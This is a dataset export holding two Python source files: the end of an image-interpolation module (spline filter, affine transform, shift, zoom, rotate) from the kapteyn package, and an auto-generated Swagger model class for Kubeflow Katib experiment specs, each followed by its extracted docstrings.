output, return_value = _ni_support._get_output(output, input,
output_type)
if order in [0, 1]:
output[...] = numpy.array(input)
else:
axis = _ni_support._check_axis(axis, input.ndim)
_nd_image.spline_filter1d(input, order, axis, output)
return return_value
def spline_filter(input, order = 3, output = numpy.float64,
output_type = None):
"""Multi-dimensional spline filter.
Note: The multi-dimensional filter is implemented as a sequence of
one-dimensional spline filters. The intermediate arrays are stored
in the same data type as the output. Therefore, for output types
with a limited precision, the results may be imprecise because
intermediate results may be stored with insufficient precision.
"""
if order < 2 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
output, return_value = _ni_support._get_output(output, input,
output_type)
if order not in [0, 1] and input.ndim > 0:
for axis in range(input.ndim):
spline_filter1d(input, order, axis, output = output)
input = output
else:
output[...] = input[...]
return return_value
def geometric_transform(input, mapping, output_shape = None,
output_type = None, output = None, order = 3,
mode = 'constant', cval = 0.0, prefilter = True,
extra_arguments = (), extra_keywords = {}):
"""Apply an arbritrary geometric transform.
The given mapping function is used to find, for each point in the
output, the corresponding coordinates in the input. The value of the
input at those coordinates is determined by spline interpolation of
the requested order.
mapping must be a callable object that accepts a tuple of length
equal to the output array rank and returns the corresponding input
coordinates as a tuple of length equal to the input array
rank. Points outside the boundaries of the input are filled
according to the given mode ('constant', 'nearest', 'reflect' or
'wrap'). The output shape can optionally be given. If not given,
it is equal to the input shape. The parameter prefilter determines
if the input is pre-filtered before interpolation (necessary for
spline interpolation of order > 1). If False it is assumed that
the input is already filtered. The extra_arguments and
extra_keywords arguments can be used to provide extra arguments
and keywords that are passed to the mapping function at each call.
Example
-------
>>> a = arange(12.).reshape((4,3))
>>> def shift_func(output_coordinates):
... return (output_coordinates[0]-0.5, output_coordinates[1]-0.5)
...
>>> print geometric_transform(a,shift_func)
array([[ 0. , 0. , 0. ],
[ 0. , 1.3625, 2.7375],
[ 0. , 4.8125, 6.1875],
[ 0. , 8.2625, 9.6375]])
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
if output_shape is None:
output_shape = input.shape
if input.ndim < 1 or len(output_shape) < 1:
raise RuntimeError('input and output rank must be > 0')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output = numpy.float64)
else:
filtered = input
output, return_value = _ni_support._get_output(output, input,
output_type, shape = output_shape)
_nd_image.geometric_transform(filtered, mapping, None, None, None,
output, order, mode, cval, extra_arguments, extra_keywords)
return return_value
def map_coordinates(input, coordinates, output_type = None, output = None,
order = 3, mode = 'constant', cval = 0.0, prefilter = True):
"""
Map the input array to new coordinates by interpolation.
The array of coordinates is used to find, for each point in the output,
the corresponding coordinates in the input. The value of the input at
those coordinates is determined by spline interpolation of the
requested order.
The shape of the output is derived from that of the coordinate
array by dropping the first axis. The values of the array along
the first axis are the coordinates in the input array at which the
output value is found.
Parameters
----------
input : ndarray
The input array
coordinates : array_like
The coordinates at which `input` is evaluated.
output_type : deprecated
Use `output` instead.
output : dtype, optional
If the output has to have a certain type, specify the dtype.
The default behavior is for the output to have the same type
as `input`.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
`mode='constant`. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is
pre-filtered with `spline_filter`_ before interpolation
(necessary for spline interpolation of order > 1).
If False, it is assumed that the input is already filtered.
Returns
-------
return_value : ndarray
The result of transforming the input. The shape of the
output is derived from that of `coordinates` by dropping
the first axis.
See Also
--------
spline_filter, geometric_transform, scipy.interpolate
Examples
--------
>>> import scipy.ndimage
>>> a = np.arange(12.).reshape((4,3))
>>> print a
array([[ 0., 1., 2.],
[ 3., 4., 5.],
[ 6., 7., 8.],
[ 9., 10., 11.]])
>>> sp.ndimage.map_coordinates(a, [[0.5, 2], [0.5, 1]], order=1)
[ 2. 7.]
Above, the interpolated value of a[0.5, 0.5] gives output[0], while
a[2, 1] is output[1].
>>> inds = np.array([[0.5, 2], [0.5, 4]])
>>> sp.ndimage.map_coordinates(a, inds, order=1, cval=-33.3)
array([ 2. , -33.3])
>>> sp.ndimage.map_coordinates(a, inds, order=1, mode='nearest')
array([ 2., 8.])
>>> sp.ndimage.map_coordinates(a, inds, order=1, cval=0, output=bool)
array([ True, False], dtype=bool
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
coordinates = numpy.asarray(coordinates)
if numpy.iscomplexobj(coordinates):
raise TypeError('Complex type not supported')
output_shape = coordinates.shape[1:]
if input.ndim < 1 or len(output_shape) < 1:
raise RuntimeError('input and output rank must be > 0')
if coordinates.shape[0] != input.ndim:
raise RuntimeError('invalid shape for coordinate array')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output = numpy.float64)
else:
filtered = input
output, return_value = _ni_support._get_output(output, input,
output_type, shape = output_shape)
_nd_image.geometric_transform(filtered, None, coordinates, None, None,
output, order, mode, cval, None, None)
return return_value
def affine_transform(input, matrix, offset = 0.0, output_shape = None,
output_type = None, output = None, order = 3,
mode = 'constant', cval = 0.0, prefilter = True):
"""Apply an affine transformation.
The given matrix and offset are used to find for each point in the
output the corresponding coordinates in the input by an affine
transformation. The value of the input at those coordinates is
determined by spline interpolation of the requested order. Points
outside the boundaries of the input are filled according to the given
mode. The output shape can optionally be given. If not given it is
equal to the input shape. The parameter prefilter determines if the
input is pre-filtered before interpolation, if False it is assumed
that the input is already filtered.
The matrix must be two-dimensional or can also be given as a
one-dimensional sequence or array. In the latter case, it is
assumed that the matrix is diagonal. A more efficient algorithms
is then applied that exploits the separability of the problem.
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
if output_shape is None:
output_shape = input.shape
if input.ndim < 1 or len(output_shape) < 1:
raise RuntimeError('input and output rank must be > 0')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output = numpy.float64)
else:
filtered = input
output, return_value = _ni_support._get_output(output, input,
output_type, shape = output_shape)
matrix = numpy.asarray(matrix, dtype = numpy.float64)
if matrix.ndim not in [1, 2] or matrix.shape[0] < 1:
raise RuntimeError('no proper affine matrix provided')
if matrix.shape[0] != input.ndim:
raise RuntimeError('affine matrix has wrong number of rows')
if matrix.ndim == 2 and matrix.shape[1] != output.ndim:
raise RuntimeError('affine matrix has wrong number of columns')
if not matrix.flags.contiguous:
matrix = matrix.copy()
offset = _ni_support._normalize_sequence(offset, input.ndim)
offset = numpy.asarray(offset, dtype = numpy.float64)
if offset.ndim != 1 or offset.shape[0] < 1:
raise RuntimeError('no proper offset provided')
if not offset.flags.contiguous:
offset = offset.copy()
if matrix.ndim == 1:
_nd_image.zoom_shift(filtered, matrix, offset, output, order,
mode, cval)
else:
_nd_image.geometric_transform(filtered, None, None, matrix, offset,
output, order, mode, cval, None, None)
return return_value
def shift(input, shift, output_type = None, output = None, order = 3,
mode = 'constant', cval = 0.0, prefilter = True):
"""Shift an array.
The array is shifted using spline interpolation of the requested
order. Points outside the boundaries of the input are filled according
to the given mode. The parameter prefilter determines if the input is
pre-filtered before interpolation, if False it is assumed that the
input is already filtered.
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
if input.ndim < 1:
raise RuntimeError('input and output rank must be > 0')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output = numpy.float64)
else:
filtered = input
output, return_value = _ni_support._get_output(output, input,
output_type)
shift = _ni_support._normalize_sequence(shift, input.ndim)
shift = [-ii for ii in shift]
shift = numpy.asarray(shift, dtype = numpy.float64)
if not shift.flags.contiguous:
shift = shift.copy()
_nd_image.zoom_shift(filtered, None, shift, output, order, mode, cval)
return return_value
def zoom(input, zoom, output_type = None, output = None, order = 3,
mode = 'constant', cval = 0.0, prefilter = True):
"""Zoom an array.
The array is zoomed using spline interpolation of the requested order.
Points outside the boundaries of the input are filled according to the
given mode. The parameter prefilter determines if the input is pre-
filtered before interpolation, if False it is assumed that the input
is already filtered.
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
if input.ndim < 1:
raise RuntimeError('input and output rank must be > 0')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output = numpy.float64)
else:
filtered = input
zoom = _ni_support._normalize_sequence(zoom, input.ndim)
output_shape = tuple([int(ii * jj) for ii, jj in zip(input.shape, zoom)])
zoom = (numpy.array(input.shape)-1)/(numpy.array(output_shape,float)-1)
output, return_value = _ni_support._get_output(output, input,
output_type, shape = output_shape)
zoom = numpy.asarray(zoom, dtype = numpy.float64)
zoom = numpy.ascontiguousarray(zoom)
_nd_image.zoom_shift(filtered, zoom, None, output, order, mode, cval)
return return_value
def _minmax(coor, minc, maxc):
if coor[0] < minc[0]:
minc[0] = coor[0]
if coor[0] > maxc[0]:
maxc[0] = coor[0]
if coor[1] < minc[1]:
minc[1] = coor[1]
if coor[1] > maxc[1]:
maxc[1] = coor[1]
return minc, maxc
def rotate(input, angle, axes = (1, 0), reshape = True,
output_type = None, output = None, order = 3,
mode = 'constant', cval = 0.0, prefilter = True):
"""Rotate an array.
The array is rotated in the plane defined by the two axes given by the
axes parameter using spline interpolation of the requested order. The
angle is given in degrees. Points outside the boundaries of the input
are filled according to the given mode. If reshape is true, the output
shape is adapted so that the input array is contained completely in
the output. The parameter prefilter determines if the input is pre-
filtered before interpolation, if False it is assumed that the input
is already filtered.
"""
input = numpy.asarray(input)
axes = list(axes)
rank = input.ndim
if axes[0] < 0:
axes[0] += rank
if axes[1] < 0:
axes[1] += rank
if axes[0] < 0 or axes[1] < 0 or axes[0] > rank or axes[1] > rank:
raise RuntimeError('invalid rotation plane specified')
if axes[0] > axes[1]:
axes = axes[1], axes[0]
angle = numpy.pi / 180 * angle
m11 = math.cos(angle)
m12 = math.sin(angle)
m21 = -math.sin(angle)
m22 = math.cos(angle)
matrix = numpy.array([[m11, m12],
[m21, m22]], dtype = numpy.float64)
iy = input.shape[axes[0]]
ix = input.shape[axes[1]]
if reshape:
mtrx = numpy.array([[ m11, -m21],
[-m12, m22]], dtype = numpy.float64)
minc = [0, 0]
maxc = [0, 0]
coor = numpy.dot(mtrx, [0, ix])
minc, maxc = _minmax(coor, minc, maxc)
coor = numpy.dot(mtrx, [iy, 0])
minc, maxc = _minmax(coor, minc, maxc)
coor = numpy.dot(mtrx, [iy, ix])
minc, maxc = _minmax(coor, minc, maxc)
oy = int(maxc[0] - minc[0] + 0.5)
ox = int(maxc[1] - minc[1] + 0.5)
else:
oy = input.shape[axes[0]]
ox = input.shape[axes[1]]
offset = numpy.zeros((2,), dtype = numpy.float64)
offset[0] = float(oy) / 2.0 - 0.5
offset[1] = float(ox) / 2.0 - 0.5
offset = numpy.dot(matrix, offset)
tmp = numpy.zeros((2,), dtype = numpy.float64)
tmp[0] = float(iy) / 2.0 - 0.5
tmp[1] = float(ix) / 2.0 - 0.5
offset = tmp - offset
output_shape = list(input.shape)
output_shape[axes[0]] = oy
output_shape[axes[1]] = ox
output_shape = tuple(output_shape)
output, return_value = _ni_support._get_output(output, input,
output_type, shape = output_shape)
if input.ndim <= 2:
affine_transform(input, matrix, offset, output_shape, None, output,
order, mode, cval, prefilter)
else:
coordinates = []
size = numpy.product(input.shape,axis=0)
size /= input.shape[axes[0]]
size /= input.shape[axes[1]]
for ii in range(input.ndim):
if ii not in axes:
coordinates.append(0)
else:
coordinates.append(slice(None, None, None))
iter_axes = list(range(input.ndim))
iter_axes.reverse()
iter_axes.remove(axes[0])
iter_axes.remove(axes[1])
os = (output_shape[axes[0]], output_shape[axes[1]])
for ii in range(size):
ia = input[tuple(coordinates)]
oa = output[tuple(coordinates)]
affine_transform(ia, matrix, offset, os, None, oa, order, mode,
cval, prefilter)
for jj in iter_axes:
if coordinates[jj] < input.shape[jj] - 1:
coordinates[jj] += 1
break
else:
coordinates[jj] = 0
return return_value
| kapteyn/interpolation.py | 20,228 | Apply an affine transformation.
The given matrix and offset are used to find for each point in the
output the corresponding coordinates in the input by an affine
transformation. The value of the input at those coordinates is
determined by spline interpolation of the requested order. Points
outside the boundaries of the input are filled according to the given
mode. The output shape can optionally be given. If not given it is
equal to the input shape. The parameter prefilter determines if the
input is pre-filtered before interpolation, if False it is assumed
that the input is already filtered.
The matrix must be two-dimensional or can also be given as a
one-dimensional sequence or array. In the latter case, it is
assumed that the matrix is diagonal. A more efficient algorithms
is then applied that exploits the separability of the problem.
Apply an arbritrary geometric transform.
The given mapping function is used to find, for each point in the
output, the corresponding coordinates in the input. The value of the
input at those coordinates is determined by spline interpolation of
the requested order.
mapping must be a callable object that accepts a tuple of length
equal to the output array rank and returns the corresponding input
coordinates as a tuple of length equal to the input array
rank. Points outside the boundaries of the input are filled
according to the given mode ('constant', 'nearest', 'reflect' or
'wrap'). The output shape can optionally be given. If not given,
it is equal to the input shape. The parameter prefilter determines
if the input is pre-filtered before interpolation (necessary for
spline interpolation of order > 1). If False it is assumed that
the input is already filtered. The extra_arguments and
extra_keywords arguments can be used to provide extra arguments
and keywords that are passed to the mapping function at each call.
Example
-------
>>> a = arange(12.).reshape((4,3))
>>> def shift_func(output_coordinates):
... return (output_coordinates[0]-0.5, output_coordinates[1]-0.5)
...
>>> print geometric_transform(a,shift_func)
array([[ 0. , 0. , 0. ],
[ 0. , 1.3625, 2.7375],
[ 0. , 4.8125, 6.1875],
[ 0. , 8.2625, 9.6375]])
Map the input array to new coordinates by interpolation.
The array of coordinates is used to find, for each point in the output,
the corresponding coordinates in the input. The value of the input at
those coordinates is determined by spline interpolation of the
requested order.
The shape of the output is derived from that of the coordinate
array by dropping the first axis. The values of the array along
the first axis are the coordinates in the input array at which the
output value is found.
Parameters
----------
input : ndarray
The input array
coordinates : array_like
The coordinates at which `input` is evaluated.
output_type : deprecated
Use `output` instead.
output : dtype, optional
If the output has to have a certain type, specify the dtype.
The default behavior is for the output to have the same type
as `input`.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
`mode='constant`. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is
pre-filtered with `spline_filter`_ before interpolation
(necessary for spline interpolation of order > 1).
If False, it is assumed that the input is already filtered.
Returns
-------
return_value : ndarray
The result of transforming the input. The shape of the
output is derived from that of `coordinates` by dropping
the first axis.
See Also
--------
spline_filter, geometric_transform, scipy.interpolate
Examples
--------
>>> import scipy.ndimage
>>> a = np.arange(12.).reshape((4,3))
>>> print a
array([[ 0., 1., 2.],
[ 3., 4., 5.],
[ 6., 7., 8.],
[ 9., 10., 11.]])
>>> sp.ndimage.map_coordinates(a, [[0.5, 2], [0.5, 1]], order=1)
[ 2. 7.]
Above, the interpolated value of a[0.5, 0.5] gives output[0], while
a[2, 1] is output[1].
>>> inds = np.array([[0.5, 2], [0.5, 4]])
>>> sp.ndimage.map_coordinates(a, inds, order=1, cval=-33.3)
array([ 2. , -33.3])
>>> sp.ndimage.map_coordinates(a, inds, order=1, mode='nearest')
array([ 2., 8.])
>>> sp.ndimage.map_coordinates(a, inds, order=1, cval=0, output=bool)
array([ True, False], dtype=bool
Rotate an array.
The array is rotated in the plane defined by the two axes given by the
axes parameter using spline interpolation of the requested order. The
angle is given in degrees. Points outside the boundaries of the input
are filled according to the given mode. If reshape is true, the output
shape is adapted so that the input array is contained completely in
the output. The parameter prefilter determines if the input is pre-
filtered before interpolation, if False it is assumed that the input
is already filtered.
Shift an array.
The array is shifted using spline interpolation of the requested
order. Points outside the boundaries of the input are filled according
to the given mode. The parameter prefilter determines if the input is
pre-filtered before interpolation, if False it is assumed that the
input is already filtered.
Multi-dimensional spline filter.
Note: The multi-dimensional filter is implemented as a sequence of
one-dimensional spline filters. The intermediate arrays are stored
in the same data type as the output. Therefore, for output types
with a limited precision, the results may be imprecise because
intermediate results may be stored with insufficient precision.
Calculates a one-dimensional spline filter along the given axis.
The lines of the array along the given axis are filtered by a
spline filter. The order of the spline must be >= 2 and <= 5.
Zoom an array.
The array is zoomed using spline interpolation of the requested order.
Points outside the boundaries of the input are filled according to the
given mode. The parameter prefilter determines if the input is pre-
filtered before interpolation, if False it is assumed that the input
is already filtered.
Copyright (C) 2003-2005 Peter J. Verveer Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. The name of the author may not be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | 7,938 | en | 0.769068 |
# coding: utf-8
"""
Katib
Swagger description for Katib # noqa: E501
OpenAPI spec version: v1alpha3-0.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from kubeflow.katib.models.v1alpha3_algorithm_spec import V1alpha3AlgorithmSpec # noqa: F401,E501
from kubeflow.katib.models.v1alpha3_metrics_collector_spec import V1alpha3MetricsCollectorSpec # noqa: F401,E501
from kubeflow.katib.models.v1alpha3_nas_config import V1alpha3NasConfig # noqa: F401,E501
from kubeflow.katib.models.v1alpha3_objective_spec import V1alpha3ObjectiveSpec # noqa: F401,E501
from kubeflow.katib.models.v1alpha3_parameter_spec import V1alpha3ParameterSpec # noqa: F401,E501
from kubeflow.katib.models.v1alpha3_trial_template import V1alpha3TrialTemplate # noqa: F401,E501
class V1alpha3ExperimentSpec(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'algorithm': 'V1alpha3AlgorithmSpec',
'max_failed_trial_count': 'int',
'max_trial_count': 'int',
'metrics_collector_spec': 'V1alpha3MetricsCollectorSpec',
'nas_config': 'V1alpha3NasConfig',
'objective': 'V1alpha3ObjectiveSpec',
'parallel_trial_count': 'int',
'parameters': 'list[V1alpha3ParameterSpec]',
'resume_policy': 'str',
'trial_template': 'V1alpha3TrialTemplate'
}
attribute_map = {
'algorithm': 'algorithm',
'max_failed_trial_count': 'maxFailedTrialCount',
'max_trial_count': 'maxTrialCount',
'metrics_collector_spec': 'metricsCollectorSpec',
'nas_config': 'nasConfig',
'objective': 'objective',
'parallel_trial_count': 'parallelTrialCount',
'parameters': 'parameters',
'resume_policy': 'resumePolicy',
'trial_template': 'trialTemplate'
}
def __init__(self, algorithm=None, max_failed_trial_count=None, max_trial_count=None, metrics_collector_spec=None, nas_config=None, objective=None, parallel_trial_count=None, parameters=None, resume_policy=None, trial_template=None): # noqa: E501
"""V1alpha3ExperimentSpec - a model defined in Swagger""" # noqa: E501
self._algorithm = None
self._max_failed_trial_count = None
self._max_trial_count = None
self._metrics_collector_spec = None
self._nas_config = None
self._objective = None
self._parallel_trial_count = None
self._parameters = None
self._resume_policy = None
self._trial_template = None
self.discriminator = None
if algorithm is not None:
self.algorithm = algorithm
if max_failed_trial_count is not None:
self.max_failed_trial_count = max_failed_trial_count
if max_trial_count is not None:
self.max_trial_count = max_trial_count
if metrics_collector_spec is not None:
self.metrics_collector_spec = metrics_collector_spec
if nas_config is not None:
self.nas_config = nas_config
if objective is not None:
self.objective = objective
if parallel_trial_count is not None:
self.parallel_trial_count = parallel_trial_count
if parameters is not None:
self.parameters = parameters
if resume_policy is not None:
self.resume_policy = resume_policy
if trial_template is not None:
self.trial_template = trial_template
@property
def algorithm(self):
"""Gets the algorithm of this V1alpha3ExperimentSpec. # noqa: E501
Describes the suggestion algorithm. # noqa: E501
:return: The algorithm of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: V1alpha3AlgorithmSpec
"""
return self._algorithm
@algorithm.setter
def algorithm(self, algorithm):
"""Sets the algorithm of this V1alpha3ExperimentSpec.
Describes the suggestion algorithm. # noqa: E501
:param algorithm: The algorithm of this V1alpha3ExperimentSpec. # noqa: E501
:type: V1alpha3AlgorithmSpec
"""
self._algorithm = algorithm
@property
def max_failed_trial_count(self):
"""Gets the max_failed_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
Max failed trials to mark experiment as failed. # noqa: E501
:return: The max_failed_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: int
"""
return self._max_failed_trial_count
@max_failed_trial_count.setter
def max_failed_trial_count(self, max_failed_trial_count):
"""Sets the max_failed_trial_count of this V1alpha3ExperimentSpec.
Max failed trials to mark experiment as failed. # noqa: E501
:param max_failed_trial_count: The max_failed_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
:type: int
"""
self._max_failed_trial_count = max_failed_trial_count
@property
def max_trial_count(self):
"""Gets the max_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
Max completed trials to mark experiment as succeeded # noqa: E501
:return: The max_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: int
"""
return self._max_trial_count
@max_trial_count.setter
def max_trial_count(self, max_trial_count):
"""Sets the max_trial_count of this V1alpha3ExperimentSpec.
Max completed trials to mark experiment as succeeded # noqa: E501
:param max_trial_count: The max_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
:type: int
"""
self._max_trial_count = max_trial_count
@property
def metrics_collector_spec(self):
"""Gets the metrics_collector_spec of this V1alpha3ExperimentSpec. # noqa: E501
For v1alpha3 we will keep the metrics collector implementation same as v1alpha1. # noqa: E501
:return: The metrics_collector_spec of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: V1alpha3MetricsCollectorSpec
"""
return self._metrics_collector_spec
@metrics_collector_spec.setter
def metrics_collector_spec(self, metrics_collector_spec):
"""Sets the metrics_collector_spec of this V1alpha3ExperimentSpec.
For v1alpha3 we will keep the metrics collector implementation same as v1alpha1. # noqa: E501
:param metrics_collector_spec: The metrics_collector_spec of this V1alpha3ExperimentSpec. # noqa: E501
:type: V1alpha3MetricsCollectorSpec
"""
self._metrics_collector_spec = metrics_collector_spec
@property
def nas_config(self):
"""Gets the nas_config of this V1alpha3ExperimentSpec. # noqa: E501
:return: The nas_config of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: V1alpha3NasConfig
"""
return self._nas_config
@nas_config.setter
def nas_config(self, nas_config):
"""Sets the nas_config of this V1alpha3ExperimentSpec.
:param nas_config: The nas_config of this V1alpha3ExperimentSpec. # noqa: E501
:type: V1alpha3NasConfig
"""
self._nas_config = nas_config
@property
def objective(self):
"""Gets the objective of this V1alpha3ExperimentSpec. # noqa: E501
Describes the objective of the experiment. # noqa: E501
:return: The objective of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: V1alpha3ObjectiveSpec
"""
return self._objective
@objective.setter
def objective(self, objective):
"""Sets the objective of this V1alpha3ExperimentSpec.
Describes the objective of the experiment. # noqa: E501
:param objective: The objective of this V1alpha3ExperimentSpec. # noqa: E501
:type: V1alpha3ObjectiveSpec
"""
self._objective = objective
@property
def parallel_trial_count(self):
"""Gets the parallel_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
How many trials can be processed in parallel. Defaults to 3 # noqa: E501
:return: The parallel_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: int
"""
return self._parallel_trial_count
@parallel_trial_count.setter
def parallel_trial_count(self, parallel_trial_count):
"""Sets the parallel_trial_count of this V1alpha3ExperimentSpec.
How many trials can be processed in parallel. Defaults to 3 # noqa: E501
:param parallel_trial_count: The parallel_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
:type: int
"""
self._parallel_trial_count = parallel_trial_count
@property
def parameters(self):
"""Gets the parameters of this V1alpha3ExperimentSpec. # noqa: E501
List of hyperparameter configurations. # noqa: E501
:return: The parameters of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: list[V1alpha3ParameterSpec]
"""
return self._parameters
@parameters.setter
def parameters(self, parameters):
"""Sets the parameters of this V1alpha3ExperimentSpec.
List of hyperparameter configurations. # noqa: E501
:param parameters: The parameters of this V1alpha3ExperimentSpec. # noqa: E501
:type: list[V1alpha3ParameterSpec]
"""
self._parameters = parameters
@property
def resume_policy(self):
"""Gets the resume_policy of this V1alpha3ExperimentSpec. # noqa: E501
Describes resuming policy which usually take effect after experiment terminated. # noqa: E501
:return: The resume_policy of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: str
"""
return self._resume_policy
@resume_policy.setter
def resume_policy(self, resume_policy):
"""Sets the resume_policy of this V1alpha3ExperimentSpec.
Describes resuming policy which usually take effect after experiment terminated. # noqa: E501
:param resume_policy: The resume_policy of this V1alpha3ExperimentSpec. # noqa: E501
:type: str
"""
self._resume_policy = resume_policy
@property
def trial_template(self):
"""Gets the trial_template of this V1alpha3ExperimentSpec. # noqa: E501
Template for each run of the trial. # noqa: E501
:return: The trial_template of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: V1alpha3TrialTemplate
"""
return self._trial_template
@trial_template.setter
def trial_template(self, trial_template):
"""Sets the trial_template of this V1alpha3ExperimentSpec.
Template for each run of the trial. # noqa: E501
:param trial_template: The trial_template of this V1alpha3ExperimentSpec. # noqa: E501
:type: V1alpha3TrialTemplate
"""
self._trial_template = trial_template
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(V1alpha3ExperimentSpec, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1alpha3ExperimentSpec):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| sdk/python/v1alpha3/kubeflow/katib/models/v1alpha3_experiment_spec.py | 12,954 | NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Returns true if both objects are equal
V1alpha3ExperimentSpec - a model defined in Swagger
Returns true if both objects are not equal
For `print` and `pprint`
Gets the algorithm of this V1alpha3ExperimentSpec. # noqa: E501
Describes the suggestion algorithm. # noqa: E501
:return: The algorithm of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: V1alpha3AlgorithmSpec
Sets the algorithm of this V1alpha3ExperimentSpec.
Describes the suggestion algorithm. # noqa: E501
:param algorithm: The algorithm of this V1alpha3ExperimentSpec. # noqa: E501
:type: V1alpha3AlgorithmSpec
Gets the max_failed_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
Max failed trials to mark experiment as failed. # noqa: E501
:return: The max_failed_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: int
Sets the max_failed_trial_count of this V1alpha3ExperimentSpec.
Max failed trials to mark experiment as failed. # noqa: E501
:param max_failed_trial_count: The max_failed_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
:type: int
Gets the max_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
Max completed trials to mark experiment as succeeded # noqa: E501
:return: The max_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: int
Sets the max_trial_count of this V1alpha3ExperimentSpec.
Max completed trials to mark experiment as succeeded # noqa: E501
:param max_trial_count: The max_trial_count of this V1alpha3ExperimentSpec. # noqa: E501
:type: int
Gets the metrics_collector_spec of this V1alpha3ExperimentSpec. # noqa: E501
For v1alpha3 we will keep the metrics collector implementation same as v1alpha1. # noqa: E501
:return: The metrics_collector_spec of this V1alpha3ExperimentSpec. # noqa: E501
:rtype: V1alpha3MetricsCollectorSpec
Sets the metrics_collector_spec of this V1alpha3ExperimentSpec.
For v1alpha3 we will keep the metrics collector implementation same as v1alpha1. # noqa: E501
:param metrics_collector_spec: The metrics_collector_spec of this V1alpha3ExperimentSpec. # noqa: E501
